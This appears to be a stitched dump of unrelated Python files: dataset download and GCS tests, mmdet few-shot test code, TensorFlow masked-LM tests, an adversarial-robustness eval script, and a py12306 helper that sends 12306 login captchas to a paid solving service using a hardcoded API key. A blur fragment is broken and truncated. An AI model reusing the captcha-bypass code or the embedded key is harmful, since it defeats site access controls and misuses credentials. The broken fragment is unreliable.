actual_result = client._md5_hex(md5_hash)
expected_result = "69b7"
assert actual_result == expected_result
def test_upload_file():
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.blob = MagicMock(return_value=mocked_blob)
mocked_blob.upload_from_filename = MagicMock()
client._upload_file(
local_path=localfile, bucket=mocked_bucket, key=base_key
)
mocked_blob.upload_from_filename.assert_called_with(localfile)
@patch("datasetinsights.io.gcs.Path.glob")
def test_upload_folder(mock_glob):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_glob.return_value = [Path(localfile)]
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client._upload_file = MagicMock()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.blob = MagicMock(return_value=mocked_blob)
mocked_blob.upload_from_filename = MagicMock()
client._upload_folder(
local_path=local_path, bucket=mocked_bucket, key=base_key
)
client._upload_file.assert_called_with(
bucket=mocked_bucket,
key=base_key + file_name,
local_path=localfile,
)
def test_gcs_downloader():
url = "gs://fake_bucket/path/to"
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.downloader.gcs_downloader.GCSClient",
MagicMock(return_value=mocked_gcs_client),
):
downloader = GCSDatasetDownloader()
downloader.download(url, local_path)
mocked_gcs_client.download.assert_called_with(
local_path=local_path, url=url
)
def test_gcs_parse():
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
th_bucket = "some_bucket_name"
th_path = "some/cloud/path"
url = "gs://some_bucket_name/some/cloud/path"
bucket, path = client._parse(url)
assert (bucket, path) == (th_bucket, th_path)
bad_url = "s3://path/to/bad/url"
with pytest.raises(ValueError, match=r"Specified destination prefix:"):
client._parse(bad_url)
```
#### File: tests/unity_perception/test_captures.py
```python
import collections
import json
import pytest
from datasetinsights.datasets.unity_perception import Captures
from datasetinsights.datasets.unity_perception.exceptions import (
DefinitionIDError,
)
from datasetinsights.datasets.unity_perception.tables import (
SCHEMA_VERSION,
glob,
)
@pytest.mark.parametrize(
"data_dir_name", ["simrun", "no_annotations_or_metrics"],
)
def test_get_captures_and_annotations(mock_data_base_dir, data_dir_name):
mock_data_dir = mock_data_base_dir / data_dir_name
captures = Captures(str(mock_data_dir), version=SCHEMA_VERSION)
captures_per_definition = collections.defaultdict(int)
json_files = glob(mock_data_dir, captures.FILE_PATTERN)
for json_file in json_files:
records = json.load(open(json_file, "r"))[Captures.TABLE_NAME]
for record in records:
for annotation in record["annotations"]:
def_id = annotation["annotation_definition"]
captures_per_definition[def_id] += 1
for def_id, count in captures_per_definition.items():
assert len(captures.filter(def_id)) == count
with pytest.raises(DefinitionIDError):
captures.filter("bad_definition_id")
```
#### File: tests/unity_perception/test_download.py
```python
import pathlib
import tempfile
from unittest.mock import patch
import numpy as np
import pandas as pd
import pytest
import responses
from datasetinsights.io.download import (
compute_checksum,
download_file,
get_checksum_from_file,
validate_checksum,
)
from datasetinsights.io.downloader.unity_simulation import (
Downloader,
FileType,
_filter_unsuccessful_attempts,
)
from datasetinsights.io.exceptions import ChecksumError, DownloadError
@pytest.fixture
def downloader():
parent_dir = pathlib.Path(__file__).parent.parent.absolute()
manifest_file = str(parent_dir / "mock_data" / "simrun_manifest.csv")
with tempfile.TemporaryDirectory() as tmp_dir:
dl = Downloader(manifest_file, tmp_dir)
yield dl
@responses.activate
def test_download_file_from_url_with_filename():
source_uri = "https://mock.uri"
body = b"some test string here"
responses.add(
responses.GET, source_uri, body=body, content_type="text/plain"
)
with tempfile.TemporaryDirectory() as tmp_dir:
dest_path = pathlib.Path(tmp_dir)
expected_file_path = dest_path / "file.txt"
file_path = download_file(source_uri, tmp_dir, file_name="file.txt")
assert file_path == expected_file_path
assert file_path.is_file()
with open(file_path, "rb") as f:
assert f.read() == body
@responses.activate
def test_download_file_from_url_without_filename():
source_uri = "https://mock.uri"
body = b"some test string here"
responses.add(
responses.GET,
url=source_uri,
body=body,
content_type="text/plain",
headers={"content-disposition": "attachment; filename=file.txt"},
)
with tempfile.TemporaryDirectory() as tmp_dir:
dest_path = pathlib.Path(tmp_dir)
expected_file_path = dest_path / "file.txt"
file_path = download_file(source_uri, dest_path)
assert file_path == expected_file_path
assert file_path.is_file()
with open(file_path, "rb") as f:
assert f.read() == body
def test_download_bad_request():
source_uri = "https://mock.uri"
dest_path = "file/path/does/not/matter"
responses.add(responses.GET, source_uri, status=403)
with pytest.raises(DownloadError):
download_file(source_uri, dest_path, False)
def test_download_rows(downloader):
n_rows = len(downloader.manifest)
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
matched_rows = pd.Series(np.zeros(n_rows).astype(bool))
downloaded = downloader._download_rows(matched_rows)
assert len(downloaded) == 0
mocked_dl.assert_not_called()
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
matched_rows = pd.Series(np.ones(n_rows).astype(bool))
downloaded = downloader._download_rows(matched_rows)
assert len(downloaded) == n_rows
assert mocked_dl.call_count == n_rows
def test_download_all(downloader):
n_rows = len(downloader.manifest)
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
downloader.download_references()
downloader.download_captures()
downloader.download_metrics()
downloader.download_binary_files()
assert mocked_dl.call_count == n_rows
def test_filter_unsuccessful_attempts_multiple_ids():
manifest_df = pd.DataFrame(
{
"run_execution_id": ["a"] * 8,
"attempt_id": [0, 1, 0, 0, 0, 1, 2, 3],
"app_param_id": [47, 47, 22, 22, 50, 50, 50, 50],
"instance_id": [0, 0, 1, 1, 2, 2, 2, 2],
}
)
expected_result = pd.DataFrame(
{
"run_execution_id": ["a"] * 4,
"attempt_id": [1, 0, 0, 3],
"app_param_id": [47, 22, 22, 50],
"instance_id": [0, 1, 1, 2],
}
)
actual_result = _filter_unsuccessful_attempts(manifest_df)
pd.testing.assert_frame_equal(expected_result, actual_result)
def test_filter_unsuccessful_attempts_single_attempt_id():
manifest_df = pd.DataFrame(
{
"run_execution_id": ["a", "a"],
"attempt_id": [0, 0],
"app_param_id": [47, 52],
"instance_id": [0, 0],
}
)
expected_result = pd.DataFrame(
{
"run_execution_id": ["a", "a"],
"attempt_id": [0, 0],
"app_param_id": [47, 52],
"instance_id": [0, 0],
}
)
actual_result = _filter_unsuccessful_attempts(manifest_df)
pd.testing.assert_frame_equal(expected_result, actual_result)
def test_match_filetypes():
manifest = pd.DataFrame(
{
"file_name": [
"abc/dfv.png",
"Dataset/annotation_definitions.json",
"Dataset/metrics_04323423.json",
"Dataset/metric_definitions.json",
"Dataset/sensors.json",
"Dataset/captures_000123153.json",
"Dataset/egos.json",
"segmentation/image_9013.png",
"lidar/points_9013.pcd",
]
}
)
expected_filetypes = [
FileType.BINARY,
FileType.REFERENCE,
FileType.METRIC,
FileType.REFERENCE,
FileType.REFERENCE,
FileType.CAPTURE,
FileType.REFERENCE,
FileType.BINARY,
FileType.BINARY,
]
assert Downloader.match_filetypes(manifest) == expected_filetypes
def test_compute_checksum():
expected_checksum = "123456"
with patch("datasetinsights.io.download._crc32_checksum") as mocked:
mocked.return_value = expected_checksum
computed = compute_checksum("filepath/not/important", "CRC32")
assert computed == expected_checksum
expected_checksum_md5 = "123456"
with patch("datasetinsights.io.download._md5_checksum") as mocked:
mocked.return_value = expected_checksum_md5
computed = compute_checksum("filepath/not/important", "MD5")
assert computed == expected_checksum
with pytest.raises(ValueError):
compute_checksum("filepath/not/important", "UNSUPPORTED_ALGORITHM")
def test_validate_checksum():
expected_checksum = "123456"
wrong_checksum = "123455"
with patch("datasetinsights.io.download.compute_checksum") as mocked:
mocked.return_value = wrong_checksum
with pytest.raises(ChecksumError):
validate_checksum("filepath/not/important", int(expected_checksum))
def test_get_checksum_from_local_file_path():
# arrange
with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as tmp:
tmp.write("123456")
tmp.flush()
# act
checksum = get_checksum_from_file(tmp.name)
# assert
assert checksum == "123456"
@pytest.mark.parametrize("filepath", ["http://some/path", "https://some/path"])
@patch("datasetinsights.io.download.download_file")
def test_get_checksum_from_http_source(mock_download_file, filepath):
# arrange
with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as tmp:
tmp.write("123456")
tmp.flush()
mock_download_file.return_value = tmp.name
# act
checksum = get_checksum_from_file(filepath)
# assert
mock_download_file.assert_called_once()
assert checksum == "123456"
@pytest.mark.parametrize(
"filepath", ["some/wrong/path", "zvsssdfsdg", "wrong/ path/file"]
)
@patch("datasetinsights.io.download.download_file")
def test_get_checksum_from_non_existing_file_or_wrong_path(
mock_download_file, filepath
):
# assert
with pytest.raises(ValueError):
# act
get_checksum_from_file(filepath)
# assert
mock_download_file.assert_not_called()
``` |
{
"source": "87003697/FewX-mmdet",
"score": 2
} |
#### File: mmdet/apis/test.py
```python
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
import pdb
import pandas as pd
import numpy as np
import os
import mmcv
import torch
import tqdm
from mmdet.datasets.pipelines import to_tensor
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
model.eval()
results = []
dataset = data_loader.dataset
if 'FsodRCNN' in str(type(model.module)):
model = get_support(model, data_loader)
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
if 'FsodRCNN' in str(type(model.module)):
model = get_support(model, data_loader)
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
def collect_results_cpu(result_part, size, tmpdir=None):
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN, ),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
def get_support(model_, data_loader,
file_client_args=dict(backend='disk'),color_type='color',
mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False):
model = model_.module
dataset = data_loader.dataset
cat2label = dataset.cat2label
reverse_id_mapper = lambda dataset_id: cat2label[dataset_id]
support_path = './data/coco/10_shot_support_df.pkl'
support_df = pd.read_pickle(support_path)
support_df['category_id'] = support_df['category_id'].map(reverse_id_mapper)
file_client = mmcv.FileClient(**file_client_args) # img loader
mean = np.array(mean, dtype=np.float32)
std = np.array(std, dtype=np.float32)
to_rgb = to_rgb
support_dict = {'res4_avg': {}, 'res5_avg': {}}
# print('-'*10,'Extracting Support Features','-'*20)
for cls in support_df['category_id'].unique():
support_cls_df = support_df.loc[support_df['category_id'] == cls, :].reset_index()
support_data_all = []
support_box_all = []
for index, support_img_df in support_cls_df.iterrows():
# Collect image as tensor
img_path = os.path.join('./data/coco', support_img_df['file_path'][2:])
img_bytes = file_client.get(img_path)
img = mmcv.imfrombytes(img_bytes, flag=color_type)
# Follow the pipeline of Normalize
img = mmcv.imnormalize(img, mean, std, to_rgb)
# Follow the pipeline of ImageToTensor
if len(img.shape) < 3:
img = np.expand_dims(img, -1)
img = to_tensor(np.ascontiguousarray(img.transpose(2, 0, 1))).cuda()
support_data_all.append(img)
# Collect bbox as tensor
bbox = support_img_df['support_box']
bbox = to_tensor(np.stack(bbox, axis = 0))
support_box_all.append(bbox)
support_features = model.extract_feat(torch.stack(support_data_all))
support_bbox_features = []
for support_features_ in support_features:
for support_feature, support_bbox in zip(support_features_,support_box_all):
# extract roi features in res4
support_bbox = torch.cat([torch.zeros_like(support_bbox[:1]), support_bbox]).float().contiguous().cuda()
support_bbox_features.append(model.roi_head.bbox_roi_extractor([support_feature.unsqueeze(0)],support_bbox.unsqueeze(0)))
# collect roi features up
support_bbox_features = torch.cat(support_bbox_features)
res4_avg = support_bbox_features.mean(0, True).mean(dim=[2,3], keepdim=True)
support_dict['res4_avg'][cls] = res4_avg.detach()
# use res5 to collect deepper features
assert model.with_shared_head
res5_feature = model.roi_head.shared_head(support_bbox_features)
res5_avg = res5_feature.mean(0, True)
support_dict['res5_avg'][cls] = res5_avg.detach()
model.support_dict = support_dict
return model_
``` |
{
"source": "871392010/relaxrender",
"score": 3
} |
#### File: features/blur/blur_naive.py
```python
gauss_kernel = numpy.array([[1,2,1],
[2,4,1],
[1,2,1]]) * 1.0/16
def blur_naive_version(iamge, districts, scale):
if(len(image.shape)!=3):
print("error")
exit(0)
new_image = image.copy()
for district in districts:
new_image = gauss_blur_naive_version(new_image, district, scale)
return new_image
def
``` |
{
"source": "872409/py12306",
"score": 2
} |
#### File: py12306/helpers/OCR.py
```python
import math
import random
from py12306.config import Config
from py12306.log.common_log import CommonLog
from py12306.vender.ruokuai.main import RKClient
class OCR:
"""
图片识别
"""
@classmethod
def get_img_position(cls, img):
"""
获取图像坐标
:param img_path:
:return:
"""
self = cls()
return self.get_img_position_by_ruokuai(img)
def get_img_position_by_ruokuai(self, img):
ruokuai_account = Config().AUTO_CODE_ACCOUNT
soft_id = '119671'
soft_key = '6839cbaca1f942f58d2760baba5ed987'
rc = RKClient(ruokuai_account.get('user'), ruokuai_account.get('pwd'), soft_id, soft_key)
result = rc.rk_create(img, 6113)
if "Result" in result:
return self.get_image_position_by_offset(list(result['Result']))
CommonLog.print_auto_code_fail(result.get("Error", '-'))
return None
def get_image_position_by_offset(self, offsets):
positions = []
width = 75
height = 75
for offset in offsets:
random_x = random.randint(-5, 5)
random_y = random.randint(-5, 5)
offset = int(offset)
x = width * ((offset - 1) % 4 + 1) - width / 2 + random_x
y = height * math.ceil(offset / 4) - height / 2 + random_y
positions.append(int(x))
positions.append(int(y))
return positions
if __name__ == '__main__':
pass
# code_result = AuthCode.get_auth_code()
``` |
{
"source": "873040/Abhishek",
"score": 2
} |
#### File: modeling/networks/masked_lm_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import keras_parameterized # pylint: disable=g-direct-tensorflow-import
from official.nlp.modeling.networks import masked_lm
from official.nlp.modeling.networks import transformer_encoder
# This decorator runs the test in V1, V2-Eager, and V2-Functional mode. It
# guarantees forward compatibility of this code for the V2 switchover.
@keras_parameterized.run_all_keras_modes
class MaskedLMTest(keras_parameterized.TestCase):
def create_network(self,
vocab_size,
sequence_length,
hidden_size,
num_predictions,
output='predictions',
xformer_stack=None):
# First, create a transformer stack that we can use to get the LM's
# vocabulary weight.
if xformer_stack is None:
xformer_stack = transformer_encoder.TransformerEncoder(
vocab_size=vocab_size,
num_layers=1,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_attention_heads=4,
)
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
lm_outputs, _ = xformer_stack([word_ids, mask, type_ids])
# Create a maskedLM from the transformer stack.
test_network = masked_lm.MaskedLM(
num_predictions=num_predictions,
input_width=lm_outputs.shape[-1],
source_network=xformer_stack,
output=output)
return test_network
def test_network_creation(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Make sure that the output tensor of the masked LM is the right shape.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
expected_output_shape = [None, num_predictions, vocab_size]
self.assertEqual(expected_output_shape, output.shape.as_list())
def test_network_invocation_with_internal_logits(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
logits_model = tf.keras.Model(test_network.inputs, test_network.logits)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
outputs = model.predict([lm_input_data, masked_position_data])
logits = logits_model.predict([lm_input_data, masked_position_data])
# Ensure that the tensor shapes are correct.
expected_output_shape = (batch_size, num_predictions, vocab_size)
self.assertEqual(expected_output_shape, outputs.shape)
self.assertEqual(expected_output_shape, logits.shape)
# Ensure that the logits, when softmaxed, create the outputs.
input_tensor = tf.keras.Input(expected_output_shape[1:])
output_tensor = tf.keras.layers.Activation(tf.nn.log_softmax)(input_tensor)
softmax_model = tf.keras.Model(input_tensor, output_tensor)
calculated_softmax = softmax_model.predict(logits)
self.assertAllClose(outputs, calculated_softmax)
def test_network_invocation_with_external_logits(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
xformer_stack = transformer_encoder.TransformerEncoder(
vocab_size=vocab_size,
num_layers=1,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_attention_heads=4,
)
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions,
xformer_stack=xformer_stack,
output='predictions')
logit_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions,
xformer_stack=xformer_stack,
output='logits')
logit_network.set_weights(test_network.get_weights())
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
logit_output = logit_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
logits_model = tf.keras.Model(([lm_input_tensor, masked_lm_positions]),
logit_output)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
outputs = model.predict([lm_input_data, masked_position_data])
logits = logits_model.predict([lm_input_data, masked_position_data])
# Ensure that the tensor shapes are correct.
expected_output_shape = (batch_size, num_predictions, vocab_size)
self.assertEqual(expected_output_shape, outputs.shape)
self.assertEqual(expected_output_shape, logits.shape)
# Ensure that the logits, when softmaxed, create the outputs.
input_tensor = tf.keras.Input(expected_output_shape[1:])
output_tensor = tf.keras.layers.Activation(tf.nn.log_softmax)(input_tensor)
softmax_model = tf.keras.Model(input_tensor, output_tensor)
calculated_softmax = softmax_model.predict(logits)
self.assertAllClose(outputs, calculated_softmax)
def test_network_invocation(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
_ = model.predict([lm_input_data, masked_position_data])
def test_unknown_output_type_fails(self):
with self.assertRaisesRegex(ValueError, 'Unknown `output` value "bad".*'):
_ = self.create_network(
vocab_size=8,
sequence_length=8,
hidden_size=8,
num_predictions=8,
output='bad')
if __name__ == '__main__':
tf.test.main()
```
#### File: utils/misc/callstack_sampler.py
```python
import contextlib
import datetime
import signal
import traceback
class CallstackSampler(object):
"""A simple signal-based Python callstack sampler.
"""
def __init__(self, interval=None):
self.stacks = []
self.interval = 0.001 if interval is None else interval
def _sample(self, signum, frame):
"""Samples the current stack."""
del signum
stack = traceback.extract_stack(frame)
formatted_stack = []
formatted_stack.append(datetime.datetime.utcnow())
for filename, lineno, function_name, text in stack:
formatted_frame = '{}:{}({})({})'.format(filename, lineno, function_name,
text)
formatted_stack.append(formatted_frame)
self.stacks.append(formatted_stack)
signal.setitimer(signal.ITIMER_VIRTUAL, self.interval, 0)
@contextlib.contextmanager
def profile(self):
signal.signal(signal.SIGVTALRM, self._sample)
signal.setitimer(signal.ITIMER_VIRTUAL, self.interval, 0)
try:
yield
finally:
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
def save(self, fname):
with open(fname, 'w') as f:
for s in self.stacks:
for l in s:
f.write('%s\n' % l)
f.write('\n')
@contextlib.contextmanager
def callstack_sampling(filename, interval=None):
"""Periodically samples the Python callstack.
Args:
filename: the filename
interval: the sampling interval, in seconds. Defaults to 0.001.
Yields:
nothing
"""
sampler = CallstackSampler(interval=interval)
with sampler.profile():
yield
sampler.save(filename)
```
#### File: research/adversarial_logit_pairing/eval.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import app
from absl import flags
import tensorflow as tf
import adversarial_attack
import model_lib
from datasets import dataset_factory
FLAGS = flags.FLAGS
flags.DEFINE_string('train_dir', None,
'Training directory. If specified then this program '
'runs in continuous evaluation mode.')
flags.DEFINE_string('checkpoint_path', None,
'Path to the file with checkpoint. If specified then '
'this program evaluates only provided checkpoint one time.')
flags.DEFINE_string('output_file', None,
'Name of output file. Used only in single evaluation mode.')
flags.DEFINE_string('eval_name', 'default', 'Name for eval subdirectory.')
flags.DEFINE_string('master', '', 'Tensorflow master.')
flags.DEFINE_string('model_name', 'resnet_v2_50', 'Name of the model.')
flags.DEFINE_string('adv_method', 'clean',
'Method which is used to generate adversarial examples.')
flags.DEFINE_string('dataset', 'imagenet',
'Dataset: "tiny_imagenet" or "imagenet".')
flags.DEFINE_integer('dataset_image_size', 64,
'Size of the images in the dataset.')
flags.DEFINE_string('hparams', '', 'Hyper parameters.')
flags.DEFINE_string('split_name', 'validation', 'Name of the split.')
flags.DEFINE_float('moving_average_decay', 0.9999,
'The decay to use for the moving average.')
flags.DEFINE_integer('eval_interval_secs', 120,
'The frequency, in seconds, with which evaluation is run.')
flags.DEFINE_integer(
'num_examples', -1,
'If positive - maximum number of example to use for evaluation.')
flags.DEFINE_bool('eval_once', False,
'If true then evaluate model only once.')
flags.DEFINE_string('trainable_scopes', None,
'If set then it defines list of variable scopes for '
'trainable variables.')
def main(_):
if not FLAGS.train_dir and not FLAGS.checkpoint_path:
print('Either --train_dir or --checkpoint_path flags has to be provided.')
if FLAGS.train_dir and FLAGS.checkpoint_path:
print('Only one of --train_dir or --checkpoint_path should be provided.')
params = model_lib.default_hparams()
params.parse(FLAGS.hparams)
tf.logging.info('User provided hparams: %s', FLAGS.hparams)
tf.logging.info('All hyper parameters: %s', params)
batch_size = params.eval_batch_size
graph = tf.Graph()
with graph.as_default():
# dataset
dataset, num_examples, num_classes, bounds = dataset_factory.get_dataset(
FLAGS.dataset,
FLAGS.split_name,
batch_size,
FLAGS.dataset_image_size,
is_training=False)
dataset_iterator = dataset.make_one_shot_iterator()
images, labels = dataset_iterator.get_next()
if FLAGS.num_examples > 0:
num_examples = min(num_examples, FLAGS.num_examples)
# setup model
global_step = tf.train.get_or_create_global_step()
model_fn_two_args = model_lib.get_model(FLAGS.model_name, num_classes)
model_fn = lambda x: model_fn_two_args(x, is_training=False)
if not FLAGS.adv_method or FLAGS.adv_method == 'clean':
logits = model_fn(images)
else:
adv_examples = adversarial_attack.generate_adversarial_examples(
images, bounds, model_fn, FLAGS.adv_method)
logits = model_fn(adv_examples)
# update trainable variables if fine tuning is used
model_lib.filter_trainable_variables(FLAGS.trainable_scopes)
# Setup the moving averages
if FLAGS.moving_average_decay and (FLAGS.moving_average_decay > 0):
variable_averages = tf.train.ExponentialMovingAverage(
FLAGS.moving_average_decay, global_step)
variables_to_restore = variable_averages.variables_to_restore(
tf.contrib.framework.get_model_variables())
variables_to_restore[global_step.op.name] = global_step
else:
variables_to_restore = tf.contrib.framework.get_variables_to_restore()
# Setup evaluation metric
with tf.name_scope('Eval'):
names_to_values, names_to_updates = (
tf.contrib.metrics.aggregate_metric_map({
'Accuracy': tf.metrics.accuracy(labels, tf.argmax(logits, 1)),
'Top5': tf.metrics.recall_at_k(tf.to_int64(labels), logits, 5)
}))
for name, value in names_to_values.iteritems():
tf.summary.scalar(name, value)
# Run evaluation
num_batches = int(num_examples / batch_size)
if FLAGS.train_dir:
output_dir = os.path.join(FLAGS.train_dir, FLAGS.eval_name)
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
tf.contrib.training.evaluate_repeatedly(
FLAGS.train_dir,
master=FLAGS.master,
scaffold=tf.train.Scaffold(
saver=tf.train.Saver(variables_to_restore)),
eval_ops=names_to_updates.values(),
eval_interval_secs=FLAGS.eval_interval_secs,
hooks=[
tf.contrib.training.StopAfterNEvalsHook(num_batches),
tf.contrib.training.SummaryAtEndHook(output_dir),
tf.train.LoggingTensorHook(names_to_values, at_end=True),
],
